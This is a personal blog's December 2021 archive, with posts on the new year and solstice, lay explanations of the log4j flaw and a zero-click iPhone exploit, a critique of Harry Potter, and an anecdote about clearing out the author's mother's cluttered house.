+++*

Symbolic Forest

A homage to loading screens.

Blog : Posts from December 2021

The calendar rolls around again

Or, the end of the year

It’s Hogmanay, or nos Calan,* or New Year’s Eve if you’re English.

In some previous years I’ve done a big summary round-up of exciting things and powerful memories from the past year. In at least one, I even did a week or so of posts counting down my top five memories of the year. 2021? Nope, I’m not doing that. Not because nothing has happened, not at all, but almost because too much has happened. I moved house twice. I met one of my best friends face-to-face for the first time. I changed jobs. I went for walks on the beach a lot. Most important of all, though, I gained confidence. I gained enough confidence in myself to look at who I really am, what has held me back in the past, and start to sort out some of those things.

So this post, then, is not about looking back, because I’ve spent a lot of time doing that over the past year and I know that I don’t have a time machine. I know I can’t go back to 2003, or 2006, or any other arbitrary point in my life. This post is about looking forward, because in 2022 there are going to be even more changes in my life. Changes that I’m going to take the lead on, be in control of, and that will put me in a position where I can live a happier life.

At some point in the next year I will ramble on about this a lot more, I’m sure, and explain more about where I’ve come from and where I’m going to. For now, to you the reader, this is all unsubstantial mist, I know. It won’t always be. For now, happy new year, blwydden newydd dda, and here’s to a better 2022. I know mine will be better, and I hope yours is too.

* It’s only just occurred to me that the Welsh word “calan”, meaning the first of the month or year, is a direct remnant of the old Roman word kalendae, from which the English word “calendar” is derived.

The turn of the year

The end of one, and the start of the next

It’s that time for the seasons to turn again. Today is the shortest day, and the solstice itself is this afternoon, here. It’s just a little bit after sunset here this year, which is nothing more than coincidence but seems rather apt.

This has been a big year, and a strange year. It’s been a year of many changes, changes I didn’t see coming but which have been embedded inside me all along. Mentally, I feel in some ways as if I’ve been working back through my own personal history, picking and teasing at it and unlocking all the mysteries which have been kept trapped inside myself for so long. Although it’s been a year of many changes, I feel as though there may be even more to come.

If it’s a clear sky tonight, I will sit outside and look for meteors, because the last few from the Geminid shower might still be visible. It probably won’t be clear, I have to say, because it’s been rather foggy here recently. Still, I can hope.

I’m posting this early in the morning whilst it’s still dark, drinking my morning cup of tea, and then I’ll be at my desk working all day fixing the various bugs I caused yesterday, because Christmas isn’t until the end of the week. But for me, this is the start of the holiday season, the turning point, the time to settle down in the darkness, to eat and drink and celebrate, and start to turn the world around.

Teaching an image to think

Computers work in unexpected ways

Following on from yesterday’s post about log4j: another security article fascinated me in the last week, too. You might have already seen it, because it was widely shared on Twitter and computer people everywhere were amazed and aghast at its engineering and its possibilities. The log4j vulnerability is a relatively pedestrian one by comparison, using something that is an entirely documented and public feature of the library. This, on the other hand, is a completely different animal.

It’s a hack which lets you run code on a stranger’s iPhone just by sending them a message. They don’t have to click on anything, they don’t even have to open it, all their phone has to do is receive it and the hacker can take their phone over. At least, could: the fix for this security hole was fixed three months ago in iOS 14.8 and later. If you are running an older version of iOS on your phone or tablet, then, er, maybe don’t. The analysis of how this hack works, by Google Project Zero, has started to be published; and if you’re a programming nerd, it is beautiful and amazing and horrific in just the same way that a biological virus is.

In short, this hack relied on the fact that an iOS device, when it receives an animated GIF, tries to hack the GIF a little so it will always loop forever whatever the GIF itself actually says to do. It does this in an unhealthy way, though. When it opens the file to change it, it doesn’t matter if it’s not actually a GIF. The software will try to be clever and say “ah, looks like your file’s got the wrong name there, don’t worry, I still know how to open one of these” and do it. Even if it’s not a GIF and therefore doesn’t really need to.

Secondly, the hack relies on a bug in an open source PDF-reading library, in the part of the code used to open embedded images that are in an obscure and rather out-of-date format mostly used by fax machines. PDF is a big, complex and rambly format (believe me I know, I’ve been on-off trying to write a .NET PDF writing library for some years now) so it’s not surprising there are bugs and holes in PDF-reading software. What this hack does, though, is frankly brilliant. It uses the capabilities of the compression algorithm of this particular graphics format to implement an entire virtual CPU in the memory of the target device. It’s a small CPU but it is a Turing-complete one, which in technical terms mean that if you ignore practical limits of time and memory, it’s just as powerful as any other computer. An entire virtual CPU…created by feeding a carefully-designed image into a buggy image decompression routine.*

Frankly, if you’re a software developer, this is genius. Evil genius, to be sure, but genius nonetheless. I’m somewhat in awe of it, in a dirty way. It’s a wonderful level of lateral thinking, to know that the bug is there to exploit and work out a way to reach it and trip it up to begin with; and then to build an entire virtual machine from the basic Boolean logic operations available inside a particular image format. As I said above, it’s beautiful, it’s amazing, and it’s horrific in the original sense of the word. It’s awe-inspiring. I might be good at my job, but I can only look upon this with amazement and envy.

* I assume the image itself looks like just so much white noise if you could actually view it, but you can’t have everything. It reminds me a little of Neal Stephenson’s early-90s novel Snow Crash, in which a carefully-designed image that looks like white noise can hack the viewer’s brain.

Some logical relief

In which we discuss a topical flaw

In many ways I lead a charmed life and hold a wide range of privileges in my hand. Not least, this week just gone, the fact that I’m a software developer who generally works with the .NET software stack. More specifically, I am not a software developer who works with Java. Java developers have not, generally speaking, been having a good week.

This is all because of a software vulnerability discovered just over a week ago in a Java library called “log4j”. To summarise, for non-experts: “log4j” is a logging library. No, not the let’s-clear-the-rainforests sort. “Logging” means your software writing diagnostic information as it goes along: records such as “user etoainshrdlu asked to see their bank balance at 9.10am from this address with that web browser”. You can see why…

Regular reader E Shrdlu (from Clacton) writes: Oi! You can’t go around giving my bank balance to people!

Hush now, I was just using you as an example! You can see why it’s useful to have this information stored away somewhere, and log4j is a software library that makes it really easy to do. Virtually all Java server-side code out there uses log4j somewhere inside it, to handle this sort of thing.

Unfortunately, log4j has a few handy features that were originally intended to be useful features, but aren’t necessarily a good idea to have running on an internet-facing server that does important work such as process your banking requests. Particularly, in this case, if you put a certain specialist type of URL into a log record, log4j will see it, try to download another program from it, and will then run that program in a certain well-defined way. Of course, you might say, there’s nothing wrong with that because all of the log record messages are just written by the bank’s own software developers, so everything’s perfectly safe. However, as I said above, one thing they may very well be logging is which browser you happen to be using, because that’s very useful diagnostic data if people start having problems. “Which browser you happen to be using”, though, is just a field that you send them, and if you know what you’re doing, you can change it to whatever you want to. Including a special type of URL which will…well, hopefully you get the picture. And now you’re running whatever programs you like on one of your bank’s internal servers. Ah. You can see now why Java developers have not been having a good week.

The fix for this is straightforward, but rolling the fix out will have involved a huge proportion of the Java code running in the world being checked, double-checked, and redeployed when it’s known to be safe. Moreover, all of the developers doing this will have had several queries a day from their managers asking just how much they are exposed to this issue. I know: I’ve had several myself, even though my response is straightforwardly “we don’t run any Java code at all, so don’t worry.” I do tell them to tell the clients we have thoroughly and conscientiously audited our systems because from a client-relations point of view it does sound a bit more professional than “no, and our tech lead is very glad of her career choices”. But it still means plenty of messages for me to answer.

Incidentally, I don’t feel any sort of schadenfreude about this, in case you were wondering. I genuinely feel sorry for a lot of people I know, who will not have had a good week fixing this stuff. I’ve worked in big banks and other similar organisations, and I know a lot of former colleagues and current friends who will have spent the last week focusing on this above all else. It’s not nice when you are suddenly bowled by a risk like this; and moreover, it’s not as if Java is uniquely likely to suffer from this type of problem. There are nuances to this that I may come back to in a later post; but next time something like this happens, the person fixing it might well be me.

Ahead of the curve

On never really understanding the popularity of something

It’s shaping up to be another quiet month on here. December is the tiredest month, after all: next week it’s Christmas itself, last week it was the office party, and in between I am at home worrying whether all the presents will get delivered in time. Time, then, to pull another old post from the backlog of drafts and get it into some sort of shape.

On Twitter over the past couple of years, it seems as if some arguments or some topics seem to come around, be propelled back into the spotlight, on a very routine and predictable schedule. An example in point: the multimillionaire writer Joanne Rowling, who seems to be unable to avoid the temptation to say controversial things on the internet which seem to have alienated huge swathes of her previous fanbase. As I said, Rowling is a multimillionaire, multimillionaires can afford expensive lawyers, and as such I am carefully stepping around the things she has said—which I, personally, have found genuinely very offensive—without describing or repeating them. In any case, offensive words are best left to wither away and drift off unheard into the wind.

The point of this post, though, is to write more about Rowling’s work than her political beliefs. It’s to say, out loud, something I’ve hinted at on here before, but never actually said out loud for fear of offending people. A dark secret, you could call it. I don’t have to go around throwing Potter merchandise or books in the bin, because I’ve never really thought Harry Potter was very good.

There, I said it. Harry Potter was never actually very good. I’ve kept quiet about this because I’ve had various close friends who, absolutely, adored it. My ex-partner H, for example, who had me take her to a midnight book launch event for the final book. Or Colleague Em, who I went to see one of the films with. I’ve still never seen all of the films, but did like their aesthetic* and did somewhat admire the way they turned a sow’s ear into, maybe not a silk purse, but something much more focused and better-structured than their source material.

My first memory of Harry Potter, the book series, is of seeing displays of the books in Waterstones in Edinburgh, back when the cover of the first was a slightly cartoonish drawing showing a steam train next to a modern InterCity one, so you can understand why it piqued my interest. I didn’t really find out what it was about, though, until a year or two later when the hype machine had started to kick in, and you started to see newspaper articles about how adults were furtively reading this “children’s book” on their morning commute. Part of that machine, you might have heard, was the whole story that she wrote the first book sitting in cafes in Edinburgh whilst living as a penniless single mother.

It was at this point I started to become wary. Back then, these stories often didn’t just talk about generic “Edinburgh cafes”. They talked about one specific cafe, Nicolsons, on the corner of Nicolson St and Drummond St. I knew it well: I spent four years studying within a stone’s throw of it, some of those years living within a stone’s throw of it too. I say “I knew it well”: I mean, I walked past it several times per day, and if you’d asked me directions to it, I’d have done fine. I went in it exactly once, the whole time I lived in Edinburgh, because when I lived there, it was the posh cafe in the area. It was the one that gave you mini doughnuts when you ordered a hot chocolate. It was certainly not one I could afford to go to very often. If I wanted to eat out I’d go to the City Restaurant,** or to a greasy spoon in Nicolson Square where I once received an unexpected shower from a sudden leak in the ceiling above me. If I wanted a coffee, I’d go home. Nicolsons? Too expensive for a student, even one with a grant and a part-time job. So I’ve always been somewhat suspicious.

Only today, as it happens, doing background reading for this blog post I discovered that Nicolsons belonged to someone in Rowling’s family at the time, and all of a sudden the story, or rather the promotion of the story, begins to make a little sense. I didn’t know that back at the time, of course; and a year or so before I left Edinburgh Nicolsons closed and was replaced with a Chinese restaurant. Other Edinburgh cafes picked up the mantle of claiming to be “the place where Harry Potter was written,” much as almost every town in Britain has a “Charles Dickens slept here” plaque if you look hard enough.

Aside from the whole question of where it was written, and how genuine that story was—which is somewhat irrelevant to the content of the books themselves—I was left entirely cold by descriptions of the story. Now, I can understand reading (or writing) books about magic. I can understand wanting to read P G Wodehouse, or to an extent even Enid Blyton.*** I was baffled by the concept of somebody wanting to write a school story in the modern, forward-thinking and progressive 1990s. Particularly a school story in which the boarding school itself was the place of safety, of order and authority, and of home. A book that posits that setting must surely be a deeply reactionary, conservative book, whichever political party the author is giving money to. Without ever reading the book, I already knew that much. As we’ve seen over the twenty-something years since, it turned out to be right.

You can see echoes of Rowling’s recent behaviour early on, in her response to whether or not it made sense for Kings Cross station to have a Platform 9 3/4, when at Kings Cross—like most large UK stations off the top of my head—platforms 9 and 10 face each other across a pair of tracks, rather than being back to back. From memory: her response was that she’d been thinking of Euston, from a time in her life when she regularly caught the train from there to Manchester. Which is fair enough, except that at Euston platforms 9 and 10 also face each other across a pair of tracks; and they’re only used by the local trains to Watford.**** It seemed odd at the time to double down rather than admit to a mistake or—as you might expect an author to do—admit to inventing something fictional in which the details don’t need to be strictly real and parallel with the real world. Nowadays, it seems more characteristic.

Harry Potter was an important part of many of my peers’ formative years. They—the ones that are my friends, at least—have distanced themselves from Rowling’s politics, and have learned to detach the art from its creator, much as I try to listen to the music of The Smiths without thinking of the politics of the lyricist. I don’t feel any pride in always being a wee bit suspicious of it, or in spotting these holes early on. Nevertheless, it does give me a slight advantage. Never having been fully into it, I don’t have to dissociate myself from it now. That’s something, I suppose.

* although A Series Of Unfortunate Events did the same aesthetic, better.

** Everyone who has lived on the South Side knows the City Restaurant; it’s an institution, although when I arrived in Edinburgh there were people who genuinely told me it just hadn’t been the same since they changed the chip fat in 1995.

*** I should add, I’ve never read any of Blyton’s “school stories”; the Famous Five books are all “what we did in our holidays” stories. I wondered even at primary school age, if you counted up the number of Famous Five books and the number of school holidays you get per year, surely they must be into their twenties by the end?

**** Edinburgh didn’t even really have a platform 9 back when Harry Potter was being written, in case you were wondering if that was the source. Back then, the only platform numbers under 10 were 1 and 7, a relict of the way train services eastwards and southwards from Edinburgh had been cut back in the 1960s. The track for platforms 8 and 9 survived, as little stubs used in the daytime to store the engines used by some of the overnight sleeping car trains to the north of Scotland which split or joined portions in Edinburgh in the middle of the night.

Finally, spring

In which The Mother is persuaded a fresh start might come in handy

For years, The Mother has been telling me the house needs cleaning out. “It’ll be too late when I’m gone,” she has said. “You should get started on it now.” And I should get started on it, of course, because for years she has had the false assumption that all of the mess and clutter in the house is mine, or is my fault somehow. This is patently untrue. Things, for example, in my bedroom right now include:

  • a vacuum cleaner
  • a steam cleaner
  • a late 90s CRT monitor (large)
  • a box of parish church paperwork
  • a set of suitcases
  • a set of cigarette cards (framed)
  • several large bags full of used jiffy bags, just in case they came in useful one day

None of these things, you have probably guessed, are actually mine.

Until recently, my bedroom also contained a pull-along shopping trolley, a considerable quantity of winter coats, and a mid-80s portable CD player, the first one my family owned. That, at least, I can claim some responsibility for, as it was my main means of listening to music in my teens. Still, no need for it to be there now. It’s time to bite the bullet, I decided. Time to actually persuade The Mother to get rid of something.

I loaded the coats into a bag, put the CD player in the back of the car, and took the trolley down to the kitchen to start loading it up with unnecessary stuff. Now, the kitchen is full of unnecessary stuff. The Mother has never seen a flat surface without wanting to hoard things on it, so virtually all of the kitchen countertops are covered in piles and piles of things: food that she hasn’t put into the cupboard, crockery that she hasn’t put away, stacks of empty takeaway containers that have been kept just in case they “come in useful”. I start loading the empty plastic into a recycling box.

“You can’t throw those out!” says The Mother, who has crept up behind me. “I’m saving those for your uncle!”

“When is he coming to collect them?” I ask. “They’ve not moved for a few months.”

“Well he comes now and again,” she replies, “and he said he uses plastic tubs to keep them in.”

“He can buy takeaways too, though,” says I, and they go. Behind them I discover gadgetry I’ve never even seen: a slow cooker, and a Nutribullet.

“I didn’t know you had a Nutribullet,” I say.

“What’s a Nutribullet?”

“It’s grey,” I say, because I’m not feeling in a particularly familial, caring mood, “and it says ‘Nutribullet’ on the side. You use it to make smoothies.”

“Oh we tried it,” she replies, “and I used it to make soup. But it was too much of a faff. It’s a right pain to clean.”

“Which is what 99% of people who buy a Nutribullet say,” I told her. “It’s going to the shop too.”

So, out of the house went: the Nutribullet, a coffee machine, the coats, the ancient CD player, a stack of CDs of Dad’s that nobody else in the family wanted, and about a third of The Mother’s excessively large supply of plain, cheap, white coffee mugs. She bought a bulk order, a few years back, so that when my dad’s old colleagues came to see him and have a natter, she could give them some cheap crockery she didn’t care about. I removed a third, on the theory that The Mother doesn’t actually know how many there are and never sees them all in one place; and so far, it seems to be working. The charity shop people were extremely excited about the CD player, it being a vintage piece, but as yet its highest bid is still under a fiver.

Naturally, the house looks barely changed. One car-load, after all, isn’t going to make a dent in many decades worth of hoarding—there is stuff hoarded by my grandparents that has been passed down the line, a line which I am going to be the one to break. Still, psychologically, it’s definitely a start.